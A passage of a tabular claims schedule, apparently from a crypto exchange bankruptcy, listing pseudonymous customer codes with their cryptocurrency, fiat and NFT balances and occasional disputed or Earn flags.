| 07389243 | | CUSDT[5], TRX[1], USD[0.01] | | |
| 07389245 | | BTC[0], CUSDT[1], DOGE[1], SOL[180.10944542], TRX[1], USD[0.00], USDT[1.0938108] | Yes | |
| 07389246 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07389247 | | BRZ[1], BTC[.03802667], CUSDT[5], DOGE[3], ETH[.95655371], ETHW[.95614332], GRT[1.00199171], LINK[1.06330988], MATIC[1018.95175105], SHIB[1], SOL[93.24479204], TRX[6], USD[16.17] | Yes | |
| 07389253 | | CUSDT[2], DOGE[1116.69057637], USD[0.00] | | |
| 07389255 | | BAT[0], USD[0.00] | | |
| 07389257 | | CUSDT[1], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07389265 | | USD[81.40] | | |
| 07389266 | | CUSDT[1], DOGE[.10579119], USD[0.00] | | |
| 07389270 | | NFT (365181281494540941/Coachella x FTX Weekend 1 #19404)[1] | | |
| 07389274 | | BRZ[6.01376919], BTC[.20039762], CUSDT[7], DOGE[3526.50549368], GRT[3], MATIC[618.2571187], SHIB[390028.30829914], SOL[11.8211809], TRX[14], USD[0.01], USDT[1.00653265] | Yes | |
| 07389277 | | DOGE[3.3672442], USD[0.00], USDT[0] | Yes | |
| 07389278 | | BRZ[1], CUSDT[2], DOGE[0.51396240], USD[0.00] | | |
| 07389280 | | USD[0.00] | | |
| 07389281 | | CUSDT[2.00006695], USD[0.00] | | |
| 07389283 | | DOGE[145.33043854], USD[0.00] | | |
| 07389287 | | DOGE[136.30472174], USD[0.00] | | |
| 07389297 | | BAT[1], BTC[.06257376], CUSDT[6], DOGE[17084.48243944], ETH[1.37301738], ETHW[1.37301738], TRX[3], USD[0.00], USDT[1] | | |
| 07389298 | | CUSDT[8], DOGE[1], USD[0.48] | | |
| 07389301 | | USD[0.00], USDT[0] | | |
| 07389303 | | USD[0.00] | | |
| 07389305 | | BRZ[1], BTC[.00020617], CUSDT[1], DOGE[.65575901], ETH[.00550798], ETHW[.00550798], USD[0.66] | | |
| 07389324 | | SOL[.05688539], USD[0.00] | | |
| 07389327 | | BTC[.00078289], CUSDT[5], DOGE[583.52427295], ETH[.01352809], ETHW[.01352809], USD[0.00] | | |
| 07389330 | | BTC[.00023656], DOGE[0.00206373], SHIB[873191.73369193], SOL[0.00006286], USD[0.00] | Yes | |
| 07389331 | | USD[0.01], USDT[0] | | |
| 07389332 | | CUSDT[1], DOGE[128.24735117], USD[0.00] | | |
| 07389340 | | DOGE[38.15453645], TRX[142.89863255], USD[10.97] | Yes | |
| 07389344 | | USD[0.00] | | |
| 07389349 | | SOL[.00010801], USD[0.00], USDT[0.00000083] | | |
| 07389357 | | USD[10.00] | | |
| 07389358 | | USD[0.62] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389364 | | SOL[0], TRX[0] | | |
| 07389366 | | CUSDT[1], USD[12.46] | | |
| 07389367 | | BRZ[1], BTC[.00075714], CUSDT[1], DOGE[405.27430396], ETH[.04253842], ETHW[.04200882], GRT[29.59840975], MATIC[13.288347], MKR[.0095005], SHIB[1520510.11064261], SOL[1.22903177], SUSHI[18.73324083], TRX[532.42923732], USD[19.25], YFI[.00052648] | Yes | |
| 07389370 | | USD[0.00] | | |
| 07389374 | | BAT[2], BRZ[4], CUSDT[4], DOGE[0], GRT[3], LINK[1], LTC[4.55969443], TRX[6], USD[0.00], USDT[0] | | |
| 07389379 | | BTC[.0000249], ETH[0], USD[2.85] | | |
| 07389382 | | USD[0.00] | | |
| 07389383 | | USD[10.00] | | |
| 07389385 | | CUSDT[24], DOGE[1], GRT[1.00367791], SOL[.02125474], TRX[9.94338063], USD[0.00], USDT[0] | Yes | |
| 07389389 | | BAT[2], BRZ[2], CUSDT[4], DOGE[1], GRT[5], SOL[1], SUSHI[672.4081582], UNI[2], USD[0.00], USDT[7.00000001] | | |
| 07389393 | | BCH[0], DOGE[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07389394 | | USD[0.00] | | |
| 07389397 | | USD[0.02] | | |
| 07389399 | | USD[0.00] | | |
| 07389401 | | USD[0.01] | | |
| 07389402 | | BAT[2], BRZ[3], DOGE[0], ETH[.80165053], ETHW[1.00165053], GRT[1], SHIB[425532.91489361], TRX[2], USD[0.00], USDT[0] | | |
| 07389404 | | CUSDT[1], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07389405 | | ETH[0], SOL[0], USD[0.00] | | |
| 07389406 | | USD[0.01] | | |
| 07389415 | Contingent, Disputed | USD[0.00] | | |
| 07389416 | | USD[0.00], USDT[0] | | |
| 07389418 | | USD[0.00], USDT[0] | Yes | |
| 07389419 | | BTC[.00993392], ETH[.07013332], ETHW[.07013332], SOL[1.1629], SUSHI[.488], USD[0.54] | | |
| 07389420 | | USD[0.00] | | |
| 07389426 | | SHIB[6782645.89115646], USD[0.00] | | |
| 07389429 | | USD[10.00] | | |
| 07389430 | | CUSDT[11], TRX[4], USD[0.00] | Yes | |
| 07389433 | | USD[10.00] | | |
| 07389439 | | ETH[.00034091], ETHW[.00034091], TRX[.586937], USDT[1.85083288] | | |
| 07389440 | | BTC[.00456107], CUSDT[3], DOGE[666.39040765], ETH[.02540312], ETHW[.02540312], LINK[2.22321823], USD[0.53] | | |
| 07389441 | | ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07389442 | | ETHW[.00030879], SOL[.1], SUSHI[.422], USD[0.23] | | |
| 07389448 | | DOGE[2523.28217136], TRX[1], USD[0.00] | | |
| 07389453 | | SOL[0] | | |
| 07389454 | | BTC[.00451067], DOGE[1], USD[0.00] | | |
| 07389455 | | BTC[.00204893], CUSDT[9], DOGE[1681.32820176], TRX[2], USD[0.00] | | |
| 07389456 | | CUSDT[3], USD[0.00] | | |
| 07389458 | | BF_POINT[200], DOGE[0], ETH[0.98907785], ETHW[0.98907785] | | |
| 07389460 | | USD[1.84] | | |
| 07389462 | | BRZ[1], CUSDT[1], DOGE[9848.40791658], USD[0.00] | Yes | |
| 07389463 | | BAT[1], BTC[0.06907222], CUSDT[6], DOGE[1], ETH[.14924057], ETHW[.14924057], LTC[.54399496], SHIB[14.15331456], TRX[3], USD[0.00], USDT[0] | | |
| 07389464 | | CUSDT[2], DOGE[200.90192611], LTC[2.24193914], TRX[897.97306686], USD[0.00] | | |
| 07389476 | | DOGE[1], TRX[2105.24672577], USD[0.00] | | |
| 07389480 | | USD[10.00] | | |
| 07389483 | | BAT[631.22545896], DOGE[0], ETH[0.31079881], ETHW[0.31061421], GRT[0], LTC[7.32668213], MATIC[145.07284742], SHIB[28233694.56641561], SOL[11.08786089], TRX[2912.95446877], USD[0.00] | Yes | |
| 07389486 | | BAT[89.9893673], BRZ[1], BTC[.00372672], CUSDT[1], DOGE[1852.22779291], ETH[.10510451], ETHW[.10403402], GRT[59.47119084], SOL[8.9567448], TRX[788.49854616], USD[0.00] | Yes | |
| 07389489 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07389492 | | CUSDT[1], DOGE[1470.83037598], USD[0.00] | Yes | |
| 07389499 | | BTC[.00020507], USD[0.00] | | |
| 07389501 | | USD[0.01] | Yes | |
| 07389502 | | USD[0.00] | | |
| 07389504 | | USD[1340.24], USDT[794.70558007] | | |
| 07389510 | | ALGO[0], AUD[0.00], AVAX[0], BCH[0], BTC[0.00272520], CAD[0.00], DAI[0], DOGE[0], ETH[0.06169486], ETHW[0.00480371], EUR[0.00], GBP[0.00], LTC[1.08415904], MKR[0.00522228], NEAR[1.31080717], NFT (310550093391994382/Founding Frens Investor #104)[1], NFT (319949249877945857/Australia Ticket Stub #2114)[1], NFT (344674149503933014/Founding Frens Investor #62)[1], NFT (459878240513528648/Entrance Voucher #1511)[1], SHIB[32564113.59039110], SOL[2.46115702], USD[0.00], USDT[0], WBTC[0] | Yes | |
| 07389517 | | USD[10.00] | | |
| 07389519 | | CUSDT[4], DOGE[.00003639], TRX[1], USD[0.03] | | |
| 07389528 | | CUSDT[1], DOGE[5], TRX[1], USD[0.01] | | |
| 07389531 | | DOGE[12.9641449], ETH[.00166448], ETHW[.00166448], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389532 | | USD[0.00] | | |
| 07389533 | | USD[10.00] | | |
| 07389534 | | USD[0.01] | Yes | |
| 07389541 | | BTC[0], DOGE[.75544625], NFT (36542169215162929/Coachella x FTX Weekend 2 #20754)[1], USD[0.00], USDT[0] | | |
| 07389545 | | DOGE[133.64456479], USD[0.00] | | |
| 07389549 | | BAT[17.85700095], USD[0.00] | | |
| 07389554 | | SOL[.00000001], TRX[.000001], USD[0.00], USDT[0] | | |
| 07389559 | | BAT[1.0165555], CUSDT[12], DOGE[.98868129], ETH[.00000001], ETHW[.00000001], SHIB[4015284.60972914], TRX[1.00028099], USD[-26.95], USDT[.00076745] | Yes | |
| 07389564 | | ALGO[133.39762387], BRZ[1], DOGE[2073.07282363], ETH[.14524109], ETHW[.14524109], GRT[1], SHIB[3906255], SOL[1.06862232], USD[0.00], USDT[1] | | |
| 07389565 | | BTC[.00088693], DOGE[7.15917641], NFT (300738330049633682/Chairman Finechimp)[1], USD[0.00] | Yes | |
| 07389570 | | BTC[.00001202], CUSDT[2], DOGE[.88484259], SHIB[17516.71674704], USD[0.00] | Yes | |
| 07389571 | | BTC[0], SOL[0], USD[0.00] | | |
| 07389573 | | USD[10.00] | | |
| 07389574 | | CUSDT[1], DOGE[22.4474872], ETH[.00009925], ETHW[.00009925], LTC[.00263969], SHIB[55958.09559512], USD[0.00] | Yes | |
| 07389575 | | SUSHI[0], USDT[0.00000022] | | |
| 07389577 | | CUSDT[7], DOGE[1], TRX[2], USD[0.00] | | |
| 07389584 | | BRZ[1], CUSDT[3], DOGE[1.00000606], USD[0.01] | | |
| 07389586 | | BAT[3.00687414], BF_POINT[300], BTC[1.17934144], DOGE[2], ETHW[35.08639875], GRT[1.00239521], NFT (306043596133103283/FTX - Off The Grid Miami #6001)[1], NFT (527403498381168590/Romeo #597)[1], NFT (549658543320200589/Entrance Voucher #3653)[1], SHIB[4], SOL[0.00000001], UNI[1.05121272], USD[3001.05], USDT[0] | | |
| 07389592 | | BRZ[2], BTC[0], CUSDT[2], DOGE[0], GRT[260.85047495], SHIB[1], TRX[1], USD[0.00] | | |
| 07389594 | | CUSDT[1], DOGE[1], ETH[.03934867], ETHW[.03934867], USD[0.00] | | |
| 07389596 | | USD[300.00] | | |
| 07389600 | | BTC[0], DOGE[0], ETH[0], SHIB[7.95306833], USD[0.01] | Yes | |
| 07389605 | | USD[0.00] | | |
| 07389606 | | ETH[.00000001], ETHW[0], GRT[.54], SOL[.00000001], USD[15.98], USDT[0] | | |
| 07389607 | | DOGE[67.72748654], TRX[334.64627735], USD[0.00] | | |
| 07389615 | | DOGE[0], ETH[0], LINK[0], NFT (474562276922221875/2974 Floyd Norman - CLE 1-0157)[1], NFT (490244247275719406/The 2974 Collection #0154)[1], NFT (507582106916380888/Birthday Cake #0154)[1], SOL[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07389618 | | BTC[0], CUSDT[3], DOGE[552.76288073], PAXG[0], TRX[2], USD[0.00] | | |
| 07389619 | | BRZ[3], CUSDT[14], DOGE[1], TRX[212.38527851], USD[0.00] | | |
| 07389621 | | BTC[.00868789], LTC[7.69086841], SOL[0], USD[0.00], USDT[0.00000160] | | |
| 07389627 | | DOGE[297.50851576], USD[0.01] | | |
| 07389628 | | CUSDT[1], DOGE[0], GRT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07389631 | | CUSDT[2], DOGE[.00000018], USD[0.00] | | |
| 07389632 | | SOL[.7], USD[15.75] | | |
| 07389635 | | USD[0.00] | | |
| 07389641 | | USD[0.00], USDT[0] | | |
| 07389642 | | DOGE[7], GRT[40.64146224], TRX[1], USD[0.00] | | |
| 07389648 | | BAT[0], BRZ[1], CAD[0.00], CUSDT[2], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07389658 | | BRZ[2], CUSDT[3], TRX[3], USD[0.00], USDT[0] | | |
| 07389661 | | DOGE[1], SOL[0], USD[7.00] | | |
| 07389666 | | DOGE[67.13077302], USD[0.00] | | |
| 07389667 | | BRZ[1], DOGE[1423.90869715], ETH[.82496208], ETHW[.82496208], TRX[2], USD[0.00], YFI[.02129489] | | |
| 07389669 | | USD[0.00], USDT[0] | | |
| 07389670 | | CUSDT[3], DOGE[563.42483362], TRX[5956.23667262], USD[0.09] | | |
| 07389672 | | CUSDT[1], DOGE[6951.89489249], TRX[.91427281], USD[0.36] | | |
| 07389676 | | BTC[0], SOL[0], SUSHI[0], USD[0.02] | | |
| 07389677 | | CUSDT[1], DOGE[276.91621105], LINK[.1410659], LTC[.01372199], SHIB[311032.50621313], TRX[105.12560056], USD[0.43] | Yes | |
| 07389678 | | CUSDT[1], DOGE[337.94702123], TRX[1], USD[0.03] | | |
| 07389685 | | TRX[5097.73121511], USD[0.00] | | |
| 07389686 | | CUSDT[3], DOGE[367.13350114], GRT[46.23910841], SHIB[249618.38375946], USD[0.03] | Yes | |
| 07389687 | | USD[9.07] | | |
| 07389690 | | CUSDT[3], TRX[1], USD[8.15], USDT[0] | | |
| 07389699 | | CUSDT[1], DOGE[1359.03161745], ETH[.00482385], ETHW[.00482369], USD[0.00] | Yes | |
| 07389701 | | USD[5.00], USDT[4.97203671] | | |
| 07389705 | | DAI[0], DOGE[.56435236], ETH[0.00002086], ETHW[0.00002086], SUSHI[.1754], USD[0.00] | | |
| 07389706 | | CUSDT[1], DOGE[38.69576198], USD[0.00] | Yes | |
| 07389708 | | BAT[77.15790284], CUSDT[2], DOGE[186.46811474], GRT[5.22843084], USD[30.00] | | |
| 07389709 | | CUSDT[1], DOGE[675.45040233], TRX[1], USD[11.07] | Yes | |
| 07389713 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389714 | | CUSDT[2], DOGE[47.96614106], TRX[56.58441603], USD[0.00] | | |
| 07389716 | | TRX[1.05011234], USD[0.00] | | |
| 07389717 | | DOGE[0.00023359], ETH[0.00007151], ETHW[0.00007151], NFT [41469547790501392/Fortuo Distinctus #116][1], SHIB[89051.46083939], USD[0.00] | | |
| 07389719 | | USD[10.00] | | |
| 07389723 | | ETH[.00000001], ETHW[0], SOL[0], UNI[.00000001], USD[0.00], USDT[0] | | |
| 07389724 | | BTC[0], DOGE[0], SHIB[5664115.73646009], USD[0.00], USDT[0] | Yes | |
| 07389727 | | BTC[.00040935], USD[0.00] | | |
| 07389729 | | BAT[1.0165555], CUSDT[2], SOL[1.32129782], TRX[1], USD[0.03] | Yes | |
| 07389730 | | CUSDT[1], USD[0.00] | Yes | |
| 07389731 | | SOL[.00000001], USD[6.07] | | |
| 07389734 | | DAI[.01702196], USD[28.07], USDT[0] | | |
| 07389736 | | BAT[1], BRZ[2], CUSDT[2], DOGE[1129.04530899], ETH[.00000357], ETHW[.00000357], SHIB[1], TRX[2], USD[0.00], USDT[0] | | |
| 07389738 | | USD[6.40] | | |
| 07389740 | | USDT[490] | | |
| 07389741 | | BAT[0], BCH[0], CUSDT[1], DOGE[0.00046074], ETH[0], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07389745 | | BAT[4.41244368], BRZ[5.07952967], CUSDT[17], DOGE[0], ETH[0], GRT[1.00498957], LINK[0], LTC[0], SUSHI[.94091988], TRX[12.39201887], USD[0.00], USDT[3.31932843] | Yes | |
| 07389746 | | BAT[1.01583093], BRZ[3], CUSDT[1], GRT[4.15891475], LTC[77.79136056], TRX[7], USD[0.01] | Yes | |
| 07389753 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07389755 | | BRZ[1], CUSDT[1], SOL[32.93674952], USD[0.00], USDT[0] | Yes | |
| 07389758 | | USD[10.00] | | |
| 07389763 | | DOGE[2], LINK[7.47114398], TRX[2212.38057016], USD[0.00] | | |
| 07389765 | | BRZ[0], BTC[0], DOGE[5.54639889], GRT[0], SOL[0], SUSHI[0], TRX[2], USD[0.00] | Yes | |
| 07389770 | | BTC[.00000001], USD[2.00] | | |
| 07389773 | | DAI[0], DOGE[0], USD[0.01] | | |
| 07389775 | | CUSDT[2], DOGE[1], SOL[58.06000937], TRX[1], USD[0.00] | Yes | |
| 07389777 | | USD[10.00] | | |
| 07389778 | | BRZ[1], CUSDT[7], TRX[1], USD[20.01] | | |
| 07389779 | | USD[10.00] | | |
| 07389781 | | DOGE[893.00964397], TRX[1], USD[0.00] | | |
| 07389782 | | NFT (507262870984035027/Coachella x FTX Weekend 2 #11137][1] | | |
| 07389783 | | USD[0.00] | | |
| 07389789 | | BTC[.00020805], USD[0.00] | | |
| 07389793 | | USD[4.46], USDT[0] | | |
| 07389794 | | USD[0.08], USDT[0] | Yes | |
| 07389796 | | CUSDT[4], DOGE[0.00009853], ETH[0], TRX[1], USD[0.01] | | |
| 07389798 | | SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07389799 | | CUSDT[3], DOGE[264.9920024], SOL[30.60448235], TRX[1003.28405137], USD[0.00] | | |
| 07389803 | | CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07389804 | | BRZ[0], CUSDT[1], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07389806 | | DOGE[20.09871514], USD[0.00] | Yes | |
| 07389808 | | USD[149.00] | | |
| 07389810 | | USD[0.20] | | |
| 07389814 | | ETH[.00000075], ETHW[.00000075], USD[0.00] | | |
| 07389818 | | ETH[0], USD[0.00], USDT[0] | | |
| 07389819 | | BTC[.00020387], USD[0.00] | | |
| 07389822 | | DOGE[2185.06160286], TRX[2718.55717235], USD[0.00] | Yes | |
| 07389823 | | BTC[.00000016], DOGE[1], ETH[.00000028], ETHW[.00000028], USD[0.00] | | |
| 07389824 | | BAT[2.23108488], DAI[.99212682], DOGE[13.57363186], GRT[.99834209], USD[0.72] | | |
| 07389825 | | BRZ[2], TRX[3], USD[0.01] | | |
| 07389828 | | CUSDT[3], TRX[1], USD[0.01] | Yes | |
| 07389834 | | DOGE[1], USD[0.00] | | |
| 07389835 | | CUSDT[1], DOGE[6.76437837], TRX[0], USD[0.00] | | |
| 07389836 | | BTC[0], DOGE[.779], SUSHI[.454], USD[0.01], USDT[0.04063438] | | |
| 07389842 | | DOGE[0], ETH[0], ETHW[0], SHIB[1267.39091080], USD[0.49] | Yes | |
| 07389847 | | USD[0.01] | Yes | |
| 07389849 | | USD[10.00] | | |
| 07389852 | | USD[81.27] | | |
| 07389856 | | BRZ[2], CUSDT[1], DOGE[958.77071894], ETH[.02630325], ETHW[.02630325], TRX[1], USD[0.01], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389858 | | ALGO[99.9], BTC[.00006125], ETH[.182479], ETHW[.092579], USD[343.03] | | |
| 07389859 | | USD[0.00] | | |
| 07389860 | | BAT[1], CUSDT[2], GRT[1], TRX[5], USD[0.00] | | |
| 07389862 | | DOGE[183.98591755], USD[0.00] | Yes | |
| 07389866 | | BTC[.00002183], USD[9.00] | | |
| 07389868 | | USD[10.00] | | |
| 07389870 | | BAT[1], BRZ[1], CUSDT[4], GRT[2.00483458], TRX[7], USD[0.01], USDT[1.02543197] | Yes | |
| 07389874 | | BTC[.00212346], CUSDT[1], DOGE[706.81739872], ETH[.04439992], ETHW[.04439992], USD[0.00] | | |
| 07389875 | | TRX[1.78926264], USD[0.00] | | |
| 07389877 | | CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07389878 | | BTC[.0000435] | | |
| 07389881 | | USD[0.21] | | |
| 07389885 | | BTC[0], DAI[0], DOGE[0], ETH[0.00006236], ETHW[0.05806236], MATIC[0], NFT [289460960044665269/Pot #200][1], NFT [290544826039006361/Pot #123][1], NFT [291094080567796178/Pot #180][1], NFT [292413283307846324/Pot #151][1], NFT [295542097210205139/Pot #90][1], NFT [296257387760688922/Pot #191][1], NFT [297526101784536016/Pot #165][1], NFT [300142729250864153/Pot #103][1], NFT [302826487668561599/Pot #128][1], NFT [303118906774616954/Pot #119][1], NFT [304015713678580986/Pot #45][1], NFT [308184470701792046/Pot #115][1], NFT [312083088207944323/Pot #76][1], NFT [313248337862856128/Pot #112][1], NFT [313527022832492696/Pot #192][1], NFT [313608240310478894/Pot #53][1], NFT [314491845315036478/Pot #38][1], NFT [314770461884544134/Pot #106][1], NFT [315336235390248059/Pot #82][1], NFT [319441786637557822/Pot #167][1], NFT [320419287600088066/Pot #92][1], NFT [321872121309222568/Pot #88][1], NFT [322097560784430/Pot #159][1], NFT [322985762198356658/Thinking About You][1], NFT [323865003431852253/Pot #147][1], NFT [326666133094004187/Pot #157][1], NFT [326893014794726308/Pot #199][1], NFT [327036240914005527/Pot #52][1], NFT [328177882759364229/Pot #131][1], NFT [328666185599064803/Rose #004/ #2][1], NFT [329079475004424206/Pot #30][1], NFT [329162014250012998/Pot #194][1], NFT [329685083815981883/Tooner #8][1], NFT [331681497519252277/Pot # 13][1], NFT [332054576661419950/Pot #117][1], NFT [332472080497908443/Pot #74][1], NFT [336112067599776018/Pot #137][1], NFT [339944434965776684/ETH #31 #2][1], NFT [342070862439444919/Rose #0045][1], NFT [342611904985360384/Pot #93][1], NFT [343234743120121775/Pot # 149][1], NFT [344590054607663555/Pot #134][1], NFT [345821310120315222/Pot #109][1], NFT [348527485067803509/Pot #49][1], NFT [348530222041246518/Pot #36][1], NFT [349180240225058085/Pot #189][1], NFT [349235223494919131/Pot #71][1], NFT [350559459538337566/Pot #14][1], NFT [351982710934782905/Rose #0043][1], NFT [352330709382461519/Pot #181][1], NFT [352575717083303772/Pot #156][1], NFT [356735703689962078/Pot #143][1], NFT [358546598530792093/Pot #152][1], NFT [358855145067306856/Pot #184 #2][1], NFT [361935009627599696/Pot #67][1], NFT [363200786809083952/Pot #19][1], NFT [363603466446530875/Pot #33][1], NFT [363664141245126400/Pot #174][1], NFT [363667314585828745/Embracing Your Dark Side][1], NFT [365598277926767482/Pot #32][1], NFT [366446753156480715/Pot #104][1], NFT [366959672498547222/Pot #44 #2][1], NFT [371245771577457566/Pot #94][1], NFT [373409345417432532/Tooner #3][1], NFT [373493997695978239/Pot #41][1], NFT [373984374590273909/Pot # 5][1], NFT [375883871582042478/Pot #114][1], NFT [376207628589322787/Pot #169][1], NFT [377870025249166647/Pot #25][1], NFT [379172958242126426/Pot #9/ #3][1], NFT [379996749399422503/Pot #146][1], NFT [382849781768640630/Pot #27][1], NFT [384991014990337694/Pot #163][1], NFT [385119938254253636/Pot #102][1], NFT [387439315029860886/Pot #56][1], NFT [387461576635726129/Pot #30 #2][1], NFT [388950332280999688/Pot #82][1], NFT [389756498984351930/Pot #37][1], NFT [390018083958122063/Rose #0044][1], NFT [391047514912341778/Pot #103][1], NFT [391117384595918047/Pot #186][1], NFT [393151112686926675/Pot #138][1], NFT [396381549545188301/Pot #155][1], NFT [397014982867614117/BTC #2][1], NFT [400319037362018237/Tooner #31][1], NFT [400651047721417547/Pot #140][1], NFT [404722323264383280/Pot #68][1], NFT [406100818624461916/Pot #153][1], NFT [406106624523202864/Pot #50][1], NFT [406187157486608142/Pot #34][1], NFT [406689634933596803/Pot #170][1], NFT [407810243324362240/ETH_3][1], NFT [409767323907891015/Pot #107][1], NFT [409932569559615129/Pot #171][1], NFT [410705158725520187/Pot #190][1], NFT [410963583052209521/Pot #135][1], NFT [414392015065424990/Pot #35][1], NFT [414727615514059349/Dancing On The Edge][1], NFT [414818129472567430/Pot #139][1], NFT [414818655937071006078/Pot #84][1], NFT [414950699092480756/Pot #36][1], NFT [415265059119100118/Pot #70][1], NFT [419632167520276269/Pot #129][1], NFT [419940169436313558/Pot #118][1], NFT [420393603512122236/Pot #188][1], NFT [422421754119851367/BTC#1][1], NFT [422542603347024252/Pot #141][1], NFT [425025182420994307/Pot #127][1], NFT [428623267574481839/Pot #39][1], NFT [431038316760104653/Pot #48][1], NFT [431458639625348287/Pot #158][1], NFT [433266423957068435/Pot #196][1], NFT [433714346600361318/Pot #15][1], NFT [434004942881153055/Pot #47][1], NFT [436127849659347455/Pot #125][1], NFT [438279127863794996/Rose #0034][1], NFT [442923285301826653/Pot # 16][1], NFT [443150185341963982/Pot #144][1], NFT [444080998200238925/Pot #66][1], NFT [449129607029343675/Pot #54][1], NFT [449189044250555215/Pot #78][1], NFT [449276405368097994/Pot #10][1], NFT [449717694643224146/Rose #0033][1], NFT [450911189742437485/Pot #133][1], NFT [452155867499046623/Pot #89][1], NFT [453711286333742587/Everlasting][1], NFT [456887427142382064/ETH #31 #1][1], NFT [459033352018822905/Pot #108][1], NFT [463414065672913502/Pot #9 #2][1], NFT [464328756134745806/Pot #20][1], NFT [464675336316823388/Pot #166][1], NFT [465209218108550700/Pot #61][1], NFT [467368777509357307/Pot #100][1], NFT [468540111155407634/Pot #26][1], NFT [473431746574751764/Pot #55][1], NFT [473560351742255866/BTC#3][1], NFT [475032024953175880/Pot #63][1], NFT [476255049585465939/Pot #23][1], NFT [477380020682619566/Pot #86][1], NFT [477374831820537933/Pot #42][1], NFT [477859248635010334/Pot #18][1], NFT [479900417612705924/ETH#1][1], NFT [480166547815118210/Rose #0035][1], NFT [481612269428099925/Pot #99][1], NFT [482666701402808327/Pot #58][1], NFT [484392761333774728/Pot #101][1], NFT [485022043711556120/Pot_#03][1], NFT [485023417804121453/Rose #0013][1], NFT [486506038197507159/Pot #165][1], NFT [489111648013370139/Pot #191][1], NFT [493045957968100496/Pot #23][1], NFT [497783582209767700/Pot #91 #2][1], NFT [498158496854197730/Pot #85][1], NFT [499475971501484664/Pot #24][1], NFT [500739014598770/Pot #21][1], NFT [501103704391260/Pot_196][1], NFT [501236994362961953/Pot_#140][1], NFT [502005476760424144/Pot #58][1], NFT [502382121397442494/Pot #187][1], NFT [506048016327600911/Pot #97][1], NFT [507135882964612592/Pot #81][1], NFT [508950471016350722/Pot #62][1], NFT [509601730134677655/Pot #162][1], NFT [509691038119847788/Pot #189][1], NFT [509909107752562557/Pot #73][1], NFT [510782951353290550/Pot # 148][1], NFT [513031752324477179/Pot #161][1], NFT [513151139543175374/Pot #28][1], NFT [513488295743876030/Pot #73][1], NFT [514314377178347472/ETH #4][1], NFT [515026974019755598/Pot #72][1], NFT [517570894865417466/Pot #81][1], NFT [517930965011722709/Pot #44][1], NFT [519335647252969435/Rose #0031][1], NFT [519789860224913693/Pot #88][1], NFT [520162005788596997/Rose #0032][1], NFT [521671037845356413/44349/Pot #29][1], NFT [526122879174492483/Pot #168][1], NFT [526641189860632612/Temptation][1], NFT [526708144082174277/Pot #113][1], NFT [527444910291092169/Pot #120][1], NFT [530505375949204447/Pot #126][1], NFT [531968064432853886/Pot #164][1], NFT [532073699968912736/Pot #176][1], NFT [532505917081568924/Pot #80][1], NFT [534416010683613823/Pot #83][1], NFT [535648217926278034/Pot #177][1], NFT [535708614477715377/Pot #160][1], NFT [538016150054561315/Pot_#91][1], NFT [538608927802262336/Pot #111][1], NFT [538987870746034257/Pot #161][1], NFT [540753981340171023/Pot_#92][1], NFT [542589232386105596/Pot #22][1], NFT [544121543600909435/Pot #195][1], NFT [545678580770463425/Pot #65][1], NFT [546677564336862032/ADA#1][1], NFT [548238627943615045/Pot #43][1], NFT [548291496871041820/Pot #79][1], NFT [548988830198932363/Pot #121][1], NFT [549585209965873163/Pot #17][1], NFT [550323960512514145/Pot #72][1], NFT [552847393934589080/Pot #145][1], NFT [552812273177594422/Pot #66][1], NFT [554288505001196977/Rose #0022][1], NFT [555737065753879845/Pot #40][1], NFT [558892918606752736/Pot #179][1], NFT [560647317860109432/Pot #87][1], NFT [562107945651897073/Pot #124][1], NFT [564701442682000066/Pot #116][1], NFT [566021783886779823/Pot #91][1], NFT [567641613516933370/Pot #84][1], NFT [568014158529399819/Pot #160][1], NFT [569882104933565839/Pot #122][1], NFT [570167609915153322/Pot #178][1], NFT [570200479514557510/Pot #132][1], NFT [570907725050280844/Rose #0023][1], NFT [571292492526204390/Pot #182][1], NFT [572828786773394202/Pot #184][1], NFT [574411851909990466/Pot #60][1], DOGE[33.26951566], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07389888 | | USD[10.00] | | |
| 07389890 | | BRZ[1], CUSDT[1], DOGE[.70240314], ETH[.00003935], ETHW[.00003935], USD[0.05] | | |
| 07389892 | | BTC[.00227336], SUSHI[11.472] | | |
| 07389895 | | DOGE[135.41469327], USD[0.00] | | |
| 07389897 | | BTC[.00010466], CUSDT[2], DOGE[.22804404], GRT[6.34713115], TRX[.73938572], USD[0.51] | | |
| 07389907 | | USD[5.86] | | |
| 07389909 | | BTC[.00022549], USD[0.00] | | |
| 07389914 | | BTC[0], ETH[0], LTC[0], SOL[0], USD[0.41] | | |
| 07389918 | | DAI[0], TRX[0], USD[0.01] | | |
| 07389919 | | DOGE[83.06054784], USD[0.00] | | |
| 07389922 | | BTC[0.06665748], ETH[0], LINK[45.6543] | | |
| 07389929 | | BAT[1.0165555], BRZ[1], DOGE[2], GRT[2.07721549], USD[0.01] | Yes | |
| 07389930 | | BRZ[0], BTC[0.05736405], USD[0.00] | | |

